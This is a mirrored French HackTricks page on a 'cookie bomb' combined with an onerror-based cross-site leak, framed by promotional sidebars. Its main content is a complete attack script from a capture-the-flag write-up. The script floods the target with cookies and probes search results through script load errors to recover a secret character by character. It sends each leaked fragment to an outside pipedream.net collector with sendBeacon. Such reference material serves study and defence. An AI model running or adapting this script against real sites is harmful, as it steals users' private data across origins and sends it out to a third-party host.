mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-13 14:53:03 +00:00
74 lines
4.5 KiB
Markdown
74 lines
4.5 KiB
Markdown
# Cookie Bomb + Fuite XS Onerror
|
|
|
|
<details>
|
|
|
|
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
|
|
|
|
* Travaillez-vous dans une **entreprise de cybersécurité**? Vous voulez voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version du PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
|
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Partagez vos astuces de piratage en soumettant des PR aux** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
Le **script** suivant pris à partir de [**ici**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) exploite une fonctionnalité qui permet à l'utilisateur d'**insérer n'importe quelle quantité de cookies**, puis de charger un fichier en tant que script sachant que la vraie réponse sera plus grande que la fausse et ensuite. En cas de succès, la réponse est une redirection avec une URL résultante plus longue, **trop grande pour être gérée par le serveur donc renvoie un code d'état http d'erreur**. Si la recherche échoue, rien ne se passera car l'URL est courte.
|
|
```html
|
|
<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form>
|
|
<script>
|
|
const $ = document.querySelector.bind(document);
|
|
const sleep = (ms) => new Promise(r => setTimeout(r, ms));
|
|
let i = 0;
|
|
const stuff = async (len=3500) => {
|
|
let name = Math.random();
|
|
$("form").target = name;
|
|
let w = window.open('', name);
|
|
$("#f").value = "_".repeat(len);
|
|
$("#f").name = i++;
|
|
$("form").submit();
|
|
await sleep(100);
|
|
};
|
|
const isError = async (url) => {
|
|
return new Promise(r => {
|
|
let script = document.createElement('script');
|
|
script.src = url;
|
|
script.onload = () => r(false);
|
|
script.onerror = () => r(true);
|
|
document.head.appendChild(script);
|
|
});
|
|
}
|
|
const search = (query) => {
|
|
return isError("https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query));
|
|
};
|
|
const alphabet = "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ";
|
|
const url = "//en4u1nbmyeahu.x.pipedream.net/";
|
|
let known = "actf{";
|
|
window.onload = async () => {
|
|
navigator.sendBeacon(url + "?load");
|
|
await Promise.all([stuff(), stuff(), stuff(), stuff()]);
|
|
await stuff(1600);
|
|
navigator.sendBeacon(url + "?go");
|
|
while (true) {
|
|
for (let c of alphabet) {
|
|
let query = known + c;
|
|
if (await search(query)) {
|
|
navigator.sendBeacon(url, query);
|
|
known += c;
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
};
|
|
</script>
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
|
|
|
|
* Travaillez-vous dans une **entreprise de cybersécurité**? Voulez-vous voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version du PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
|
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Partagez vos astuces de piratage en soumettant des PR au** [**dépôt hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**dépôt hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|